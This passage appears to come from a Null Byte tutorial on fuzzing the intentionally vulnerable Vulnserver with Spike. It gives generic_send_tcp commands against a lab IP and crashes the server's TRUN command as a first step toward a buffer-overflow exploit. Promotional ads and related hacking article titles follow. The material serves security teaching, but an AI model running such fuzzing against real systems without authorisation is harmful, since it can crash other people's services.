Vulnserver. Let's typeHELP.Vulnserver responds with its valid commands.Step 2: Fuzzing with SpikeSpike has the capability of generating custom scripts to test the various protocols and applications. These custom scripts are really the strength of Spike. When a script is created in Spike, it is appended with the .spk extension. Therefore, if we want to find ready-made Spike scripts before we advance to writing our own, we can find them by typing:kali >locate .spkThis will locate any file with .spk in it. When we do so in Kali, we get the output seen below.Each of these scripts is designed to "audit" various protocols and attempt to "break" them. They are organized into directories based upon the protocol they are designed to "break." We can find them all at:/usr/share/spike/auditsWhen we navigate to that directory and do a long listing (ls -l), we can see all of the sub-directories with scripts for auditing various protocols.kali cd /usr/share/spike/auditskali ls -lAs you can see in the screenshot above, there are many ready built "spikes" that you can use to audit protocols such as:CompaqMS Exchange 2000IMAPOracleMS SQL ServerSMTPFTPPOP3And many othersEach directory then includes numerous scripts that can used to test and audit the given protocol.Step 3: Fuzzing TCP ApplicationsIn this tutorial, we will be fuzzing a server, so we will probably want to use either TCP or UDP. Spike has a built-in script interpreter for each, namely generic_send_tcp and generic_send_udp, respectively. These interpreters are capable of sending data (in our case, fuzzed data) to the respective protocols when we supply an IP address and port number.In Kali, these commands can be found at/usr/bin, meaning that we can run them from any directory. In addition, we can access them through the GUI at Applications -> Kali Linux -> Vulnerability Analysis -> Fuzzing Tools.Let's try typing generic_send_tcp and see whether we can pull a help screen to give us some idea of how to use this command.kali > generic_send_tcpAs you can see above, when we run this command, it returns a basic help screen. Note that to run this command, we simply need to supply:Target IP addressPort numberA spike script anSKIPVAR and SKIPSTRA typical command might look something like this:kali > ./generic_send_tcp 192.168.1.101 80 somespikescript.spk somevariable somestringAll of the parameters here, I think, are self-explanatory with the exception of the last two, SKIPVAR and SKIPSTR. These two variables enable us to move to the middle of a fuzzing session defined by a Spike script. In other words, we can start a script, stop it, and then return to it at a later time. In our case, we will keep things simple and set these variables to 0.Let's try using one of the built-in scripts against our Vulnserver to start. Let's try fuzzing the SMTP protocol of our Vulnserver.kali > generic_send_tcp 192.168.181.129 9999 /usr/share/spike/audits/SMTP/smtp1.spk 0 0As you can see in the screenshot above, this command starts Spike sending random, oversized, and invalid input to the SMTP server to test whether it can "handle" these inputs. If we go back to our Vulnserver on our Windows system, we can see that the Vulnserver handled this onslaught of irregular data without skipping a beat!Step 4: Creating Our Own Fuzzing ScriptThe beauty of Spike is that we can create our own script to fuzz a particular protocol or application. Remember, when we connected to the Vulnserver withNetcatabove, Vulnserver responded with its banner, and when we typed HELP, it responded with its commands. Let's try creating a script that will test the TRUN command in Vulnserver.We need to open a text editor to create our script. Any text editor will do, but I will be using Leafpad for this tutorial. Our script will:Read the banner that the server sends;Simulate that the user sending the TRUN command;Randomize the user input with the TRUN command.Your simple script should look like that below. It reads the banner (line 1), send the TRUN command (line 2), and sends randomized input with the TRUN command (line 3).When you completed the script, save it asspiketrunaudit.spkin the/usr/share/spike/auditsdirectory. Once we have completed our simple script, we need to send it to our Vulnserver. We can do this by typing:kali > generic_send_tcp 192.168.181.129 9999 /usr/share/spike/audits/spiketrunaudit.spk 0 0Where:192.168.181.129is the target IP9999is the target port number/usr/share/spike/audit/spiketrunaudit.spkis the absolute path to our audit script0is the SPKVAR value0is the SPKSTR valueWhen we hit Enter, Spike will begin to send the randomized and invalid data with the TRUN command to our server, as seen below. Eventually, we will see the following message: "Couldn't tcp connect to target tried to send to a closed socket!" Something has obviously gone wrong with our Vulnserver!Now, let's go back to our Windows machine and check on our Vulnserver. As you can see below, the Vulnserver has stopped! Our fuzzing with randomized and invalid inputs to the TRUN command has caused the server to crash. That's why we received the message in Spike on our Kali system that we could no longer connect. We now know that the TRUN command on this server is vulnerable!Fuzzing is the process of sending unexpected data at an application or protocol usually in the form of randomized, oversized, and invalid input to see whether we can create a buffer overflow or otherwise cause a fault in the system. This is a key step in finding a vulnerable buffer that we can then later develop an exploit for.Spike is an excellent, if under-documented, fuzzing framework for creating your own unique fuzzers. Its flexibility and adaptability are its strength and to find unknown buffer overflows, you are likely going to need to generate your own unique fuzzer.Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseRelatedHow To:The Art of 0-Day Vulnerabilities, Part2: Manually FuzzingHack Like a Pro:Exploring Metasploit Auxiliary Modules (FTP Fuzzing)How To:Create a Metasploit Exploit in Few MinutesHack Like a Pro:How to Build Your Own Exploits, Part 2 (Writing a Simple Buffer Overflow in C)Hack Like a Pro:How to Build Your Own Exploits, Part 1 (Introduction to Buffer Overflows)Hack Like a Pro:How to Exploit and Gain Remote Access to PCs Running Windows XPHow To:Exploit Development-Everything You Need to KnowHack Like a Pro:How to Exploit IE8 to Get Root Access When People Visit Your WebsiteHow To:Exploit Development-Stack Base Buffer Overflow/Part 1(VIDEO)Hack Like a Pro:How to Exploit Adobe Flash with a Corrupted Movie File to Hack Windows 7News:Test Your Hacking / Exploiting Skills with SmashTheStack!Hack Like a Pro:Metasploit for the Aspiring Hacker, Part 1 (Primer & Overview)How to Hack Like a Pro:Getting Started with MetasploitHack Like a Pro:Metasploit for the Aspiring Hacker, Part 4 (Armitage)Hack Like a Pro:Use Your Hacking Skills to Haunt Your Boss with This Halloween PrankHow To:The Art of 0-Day Vulnerabilities, Part 1: STATIC ANALYSISHack Like a Pro:How to Hack Windows 7 to See Whether Your Girlfriend Is Cheating or NotHack Like a Pro:How to Find Exploits Using the Exploit Database in KaliHack Like a Pro:Exploit MS Word to Embed a Listener on Your Roommate's ComputerHowTo:Build Your Own DIY SuperMacro LensHack Like a Pro:Hacking Windows XP Through Windows 8 Using Adobe Flash PlayerHack Like a Pro:How Windows Can Be a Hacking Platform, Pt. 1 (Exploit Pack)Hack Like a Pro:How to Hack Web Apps, Part 5 (Finding Vulnerable WordPress Websites)How To:Hack Your Kindle Touch to Get It Ready for Homebrew Apps & MoreHack Like a Pro:Hacking Samba on Ubuntu and Installing the MeterpreterWeekend Homework:How to Become a Null Byte ContributorNews:Null Byte Is Calling for Contributors!Weekend Homework:How to Become a Null Byte Contributor (1/12/2012)News:Irving shows his affectionate sideHow To:9 Beer-Spiked Recipes for Your Next Cooking AdventureCommunity Byte:HackThisSite Walkthrough, Part 3 - Legal Hacker TrainingHow To:The Hacks Behind Cracking, Part 2: How to Generate Software KeysNews:Make arak-spiked chocolate cakeIPsec Tools of the Trade:Don't Bring a Knife to a GunfightHow To:Build Your Own "Pogo Mo Thoin" to Flash Any Xbox 360 DVD Drive for Under $5